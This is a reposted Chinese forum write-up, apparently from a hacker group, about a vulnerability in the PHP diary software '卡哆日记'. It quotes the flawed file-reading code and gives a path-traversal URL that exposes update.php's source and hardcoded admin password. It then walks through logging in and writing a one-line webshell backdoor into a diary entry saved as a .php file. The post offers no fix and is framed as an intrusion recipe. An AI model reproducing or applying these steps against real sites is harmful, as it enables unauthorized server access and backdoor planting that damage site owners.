[转载]卡哆日记存在严重问题
文章作者:saiy火狐某鱼[ F S T ]受影响版本:
卡哆日记 所有版本(我就晓得一个版本,在中国站长站下载率好高哦)
作者站点 :_blank>[url]http://www.kaduo.com[/url] (在她站点上没找到这款日记本,虽然很好看,但是老了点,我是看代码无意翻找出来的,fox老大叫我增加阅读,偶就在站长站找代码读啊读啊读啊读,果然,阅读发现漏洞,早我为什么不去读啊。PS。。。。
************************************************************
其实日记在阅读的时候是用了框架并且限制住了鼠标右键,实际日记调用的页是content.php。在那个页的代码是这样的!
<?php
$fp=fopen($diaryfile,r);
while(!feof($fp)){
$text=fgets($fp,1024);
$text=eregi_replace("<br>","",$text);
echo eregi_replace("\n","<br>",$text);
}
fclose($fp);
?>
单纯的读$diaryfile这个文件!!
$diaryfile=$y."-".$m."/".$d;
$diaryfile=说白了就是年-月/日。懂吗?就是假设今天写了日记就是。
$diaryfile=2005-1/8
8为2005-1下一个无后缀的文件,呼~这样都行?她强,谁叫她是女孩子呢?思想单纯了一点,提交网址:_blank>[url]http://www.test.com/rj/content.php?y=2005&m=01&d=../update.php[/url]
呼,我们看到了什么?
此主题相关图片
<?php<br>/*......................................................*/<br>/* */<br>/* 本程序由姑嗒哆友情提供 */<br>/* 卡哆日记2002(共享版)v1.14 */<br>/* _blank>[url]http://www.kaduo.com[/url] [email]gudaduo@kaduo.com[/email] */<br>/* */<br>/*......................................................*/<br>header("content-Type: text/html; charset=gb2312");<br>$upw="1234";<br>//请勿修改以下部分<br>if(file_exists("install.php")) unlink("install.php");<br>if($para=="menu"){<br> menu();<br> header("location:$jump");<br>
看到了吗?密码是1234!!
那现在我们来干些什么呢?
登陆_blank>[url]http://www.test.com/rj/update.php[/url]
输入密码,在日期那里最后一个日那里写成.php,今天是9号了啊?吓,就是9.php~~写后门程序吧~~~建议写一句话后门,因为会被转义的!!
写完访问地址为_blank>[url]http://www.test.com/rj/2005-1/9.php[/url]
此主题相关图片
此漏洞也没什么好说的,无非是既然读代码了,读出问题了,就写一下吧!
页:
[1]